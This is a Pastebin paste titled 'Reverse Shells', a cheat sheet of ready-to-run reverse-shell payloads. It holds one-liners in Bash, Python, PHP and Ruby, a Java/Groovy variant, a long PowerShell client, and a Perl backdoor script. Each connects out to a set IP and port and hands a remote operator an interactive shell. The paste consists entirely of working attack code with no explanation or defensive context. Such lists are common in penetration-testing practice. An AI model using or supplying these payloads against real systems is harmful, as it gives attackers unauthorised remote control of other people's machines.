Advertisement
joemccray

Reverse Shells

Jul 23rd, 2015
1,639
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.40 KB | None | 0 0
  1. exec /bin/bash 0&0 2>&0
  2.  
  3. ########
  4. # Bash #
  5. ########
  6. bash -i >& /dev/tcp/192.168.153.2/1234 0>&1
  7.  
  8.  
  9.  
  10. ########
  11. # Perl #
  12. ########
  13. perl -e 'use Socket;$i="127.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
  14.  
  15.  
  16.  
  17. cat perlbackdoor.pl
  18. #!/usr/bin/perl
  19. use Socket;
  20. use FileHandle;
  21. $IP = $ARGV[0];
  22. $PORT = $ARGV[1];
  23. socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname("tcp"));
  24. connect(SOCKET, sockaddr_in($PORT,inet_aton($IP)));
  25. SOCKET->autoflush();
  26. open(STDIN, ">&SOCKET");
  27. open(STDOUT,">&SOCKET");
  28. open(STDERR,">&SOCKET");
  29. system("/bin/sh -i");
  30.  
  31.  
  32. ##########
  33. # Python #
  34. ##########
  35. python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("127.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
  36.  
  37.  
  38. #######
  39. # Php #
  40. #######
  41. php -r '$sock=fsockopen("127.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
  42.  
  43.  
  44. ########
  45. # ruby #
  46. ########
  47. ruby -rsocket -e'f=TCPSocket.open("127.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
  48.  
  49.  
  50.  
  51. ########
  52. # Java #
  53. ########
  54. r = Runtime.getRuntime()
  55. p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
  56. p.waitFor()
  57.  
  58.  
  59. exec 5<>/dev/tcp/127.0.0.1/1234
  60.  
  61.  
  62. cat <&5 | while read line; do $line 2>&5 >&5; done
  63.  
  64. exec 5<>/dev/tcp/127.0.0.1/1234
  65.  
  66. while read line 0<&5; do $line 2>&5 >&5; done
  67. 0<&196;exec 196<>/dev/tcp/127.0.0.1/1234; sh <&196 >&196 2>&196
  68.  
  69.  
  70. ##############
  71. # Powershell #
  72. ##############
  73. powershell -command "function ReverseShellClean {if ($client.Connected -eq $true) {$client.Close()}; if ($process.ExitCode -ne $null) {$process.Close()}; exit; };$address = '127.0.0.1'; $port = '1234';$client = New-Object system.net.sockets.tcpclient; $client.connect($address,$port) ;$stream = $client.GetStream();$networkbuffer = New-Object System.Byte[] $client.ReceiveBufferSize ;$process = New-Object System.Diagnostics.Process ;$process.StartInfo.FileName = 'C:\\windows\\system32\\cmd.exe' ;$process.StartInfo.RedirectStandardInput = 1 ;$process.StartInfo.RedirectStandardOutput = 1;$process.StartInfo.UseShellExecute = 0 ;$process.Start() ;$inputstream = $process.StandardInput ;$outputstream = $process.StandardOutput ;Start-Sleep 1 ;$encoding = new-object System.Text.AsciiEncoding ;while($outputstream.Peek() -ne -1){$out += $encoding.GetString($outputstream.Read())};$stream.Write($encoding.GetBytes($out),0,$out.Length) ;$out = $null; $done = $false; $testing = 0; ;while (-not $done) {if ($client.Connected -ne $true) {cleanup} ;$pos = 0; $i = 1; while (($i -gt 0) -and ($pos -lt $networkbuffer.Length)) { $read = $stream.Read($networkbuffer,$pos,$networkbuffer.Length - $pos); $pos+=$read; if ($pos -and ($networkbuffer[0..$($pos-1)] -contains 10)) {break}} ;if ($pos -gt 0){ $string = $encoding.GetString($networkbuffer,0,$pos); $inputstream.write($string); start-sleep 1; if ($process.ExitCode -ne $null) {ReverseShellClean};else { $out = $encoding.GetString($outputstream.Read()); while($outputstream.Peek() -ne -1){; $out += $encoding.GetString($outputstream.Read()); if ($out -eq $string) {$out = ''}}; $stream.Write($encoding.GetBytes($out),0,$out.length); $out = $null; $string = $null}} else {ReverseShellClean}};"
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement